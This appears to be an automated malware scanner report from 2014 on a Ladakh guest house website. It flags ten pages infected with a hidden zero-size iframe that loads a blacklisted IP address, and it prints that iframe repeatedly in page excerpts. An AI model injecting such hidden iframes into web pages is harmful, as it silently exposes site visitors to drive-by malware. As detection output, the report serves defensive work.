New scan:

Malware Scanner report for rainbowghleh.com

Malicious/Suspicious/Total urls checked
10/0/31
10 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "rainbowghleh.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
10/0/10
10 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rainbowghleh.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://rainbowghleh.com/
200 OK
Content-Length: 6402
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[700 bytes skipped]...
kh,Rainbow Guest House Leh,Home Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="images/rgh_logo.png" />
<link rel="stylesheet" href="mycss.css"/>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2" oncontextmenu="return false"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='admin_panel'"> Login </div>
<div id="logo" ><img src="images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="images/heading.png" title="www.RainbowGH
...[6484 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/aboutus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:41 GMT
Location: http://rainbowghleh.com/aboutus/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/aboutus/
200 OK
Content-Length: 5437
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[814 bytes skipped]...
NTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="../images/rgh_logo.png" />
<link rel="stylesheet" href="../mycss.css"/>
<style type="text/css">
#factfiles{font-size:13px;background-color:#291c14;padding:7px 10px 7px 10px;}
</style>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='../admin_panel'"> Login </div>
<div id="logo" ><img src="../images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="../images/heading.png" title="www.
...[5669 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/aboutus/../
200 OK
Content-Length: 6402
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[700 bytes skipped]...
kh,Rainbow Guest House Leh,Home Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="images/rgh_logo.png" />
<link rel="stylesheet" href="mycss.css"/>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2" oncontextmenu="return false"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='admin_panel'"> Login </div>
<div id="logo" ><img src="images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="images/heading.png" title="www.RainbowGH
...[6484 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/aboutus/../aboutus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:42 GMT
Location: http://rainbowghleh.com/aboutus/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/test404page.js
404 Not Found
Content-Length: 527
Content-Type: text/html
clean
http://rainbowghleh.com/aboutus/../tariff
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:43 GMT
Location: http://rainbowghleh.com/tariff/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/tariff/
200 OK
Content-Length: 4382
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[730 bytes skipped]...
e Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="../images/rgh_logo.png" />
<link rel="stylesheet" href="../mycss.css"/>
<style type="text/css">
</style>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='../admin_panel'"> Login </div>
<div id="logo" ><img src="../images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="../images/heading.png" title="www.
...[4315 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/tariff/../
200 OK
Content-Length: 6402
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[700 bytes skipped]...
kh,Rainbow Guest House Leh,Home Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="images/rgh_logo.png" />
<link rel="stylesheet" href="mycss.css"/>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2" oncontextmenu="return false"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='admin_panel'"> Login </div>
<div id="logo" ><img src="images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="images/heading.png" title="www.RainbowGH
...[6484 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/tariff/../aboutus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:44 GMT
Location: http://rainbowghleh.com/aboutus/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/tariff/../tariff
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:44 GMT
Location: http://rainbowghleh.com/tariff/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/tariff/../booking
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:44 GMT
Location: http://rainbowghleh.com/booking/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/booking/
200 OK
Content-Length: 8661
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[1965 bytes skipped]...
nly allowed .";
document.forms[0].elements[6].focus();
return (false);
}
if(isNaN(document.forms[0].elements[7].value))
{
document.getElementById("validation_msg").innerHTML="Wrong Value ! Integers only allowed .";
document.forms[0].elements[7].focus();
return (false);
}
}
}
</script>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='../admin_panel'"> Login </div>
<div id="logo" ><img src="../images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="../images/heading.png" title="www.R
...[8795 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/booking/../
200 OK
Content-Length: 6402
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[700 bytes skipped]...
kh,Rainbow Guest House Leh,Home Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="images/rgh_logo.png" />
<link rel="stylesheet" href="mycss.css"/>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2" oncontextmenu="return false"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='admin_panel'"> Login </div>
<div id="logo" ><img src="images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="images/heading.png" title="www.RainbowGH
...[6484 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/booking/../aboutus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:46 GMT
Location: http://rainbowghleh.com/aboutus/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/booking/../tariff
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:46 GMT
Location: http://rainbowghleh.com/tariff/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/booking/../booking
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:46 GMT
Location: http://rainbowghleh.com/booking/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/booking/../gallery
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:47 GMT
Location: http://rainbowghleh.com/gallery/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/gallery/
200 OK
Content-Length: 3761
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[1145 bytes skipped]...
cts,builder"></script>
<script type="text/javascript" src="../jquery/lightbox/lightbox.js"></script>
<link rel="stylesheet" href="../jquery/lightbox/lightbox.css" type="text/css" media="screen" />
<link rel="stylesheet" href="../mycss.css"/>
<style type="text/css">
</style>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='../admin_panel'"> Login </div>
<div id="logo" ><img src="../images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="../images/heading.png" title="www.R
...[2885 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/gallery/../jquery/lightbox/prototype.js
200 OK
Content-Length: 163312
Content-Type: application/x-javascript
clean
http://rainbowghleh.com/booking/../../jquery/lightbox/scriptaculous.js?load=effects,builder
400 Bad Request
Content-Length: 541
Content-Type: text/html
clean
http://rainbowghleh.com/booking/../../jquery/lightbox/lightbox.js
400 Bad Request
Content-Length: 541
Content-Type: text/html
clean
http://rainbowghleh.com/booking/../contact
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:49 GMT
Location: http://rainbowghleh.com/contact/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/contact/
200 OK
Content-Length: 6869
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[2853 bytes skipped]...
document.getElementById("validation_msg").innerHTML="<font color='red'>Please fill in your Body Section.</font> ";
return(false);
}
}
document.getElementById("validation_msg").innerHTML="<font color='green'>Press Send button anytime to send message.</font> ";
}
}
</script>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='../admin_panel'"> Login </div>
<div id="logo" ><img src="../images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="../images/heading.png" title="www.R
...[5422 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/contact/../
200 OK
Content-Length: 6402
Content-Type: text/html
malicious
Page code contains blacklisted domain: 82.118.17.38

...[700 bytes skipped]...
kh,Rainbow Guest House Leh,Home Stay at Leh,Leh Ladakh,Ladakh Tour,Visit Ladakh">
<META NAME="author" CONTENT="Phuntsog Wangdus">
<META NAME="revisit-after" CONTENT="2">
<link rel="shortcut icon" href="images/rgh_logo.png" />
<link rel="stylesheet" href="mycss.css"/>
</head>
<body vlink="#d1d1f2" alink="#d1d1f2" link="#d1d1f2" oncontextmenu="return false"><iframe src="http://82.118.17.38/?2" width="0" height="0" align="none"></iframe>
<div id="wrapper">
<div id="header">
<div id="indent1">
<div id="header-box">
<div id="banner">
<div id="banner_header">
<div id="login" onclick="location.href='admin_panel'"> Login </div>
<div id="logo" ><img src="images/rgh_logo.png" title="www.RainbowGHLeh.com" /></div>
<img src="images/heading.png" title="www.RainbowGH
...[6484 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 20 websites.
size: 0x0     
src: http://82.118.17.38/?2
This URL is marked by Google as suspicious

<iframe src="http://82.118.17.38/?2" width="0" height="0" align="none">

http://rainbowghleh.com/contact/../aboutus
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:51 GMT
Location: http://rainbowghleh.com/aboutus/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/contact/../tariff
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:51 GMT
Location: http://rainbowghleh.com/tariff/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/contact/../booking
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:51 GMT
Location: http://rainbowghleh.com/booking/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/contact/../gallery
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:52 GMT
Location: http://rainbowghleh.com/gallery/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/contact/../contact
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 09 May 2014 23:39:52 GMT
Location: http://rainbowghleh.com/contact/
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1
clean
http://rainbowghleh.com/booking/../../aboutus
400 Bad Request
Content-Length: 541
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rainbowghleh.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 09 May 2014 23:39:40 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Content-Length: 6402
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=0267fbc132fe08aa74c3c6460418f872; path=/
X-Powered-By: PHP/5.2.17

...6402 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rainbowghleh.com
Referer: http://www.google.com/search?q=rainbowghleh.com

Result:
The result is similar to the first query. There are no suspicious redirects found.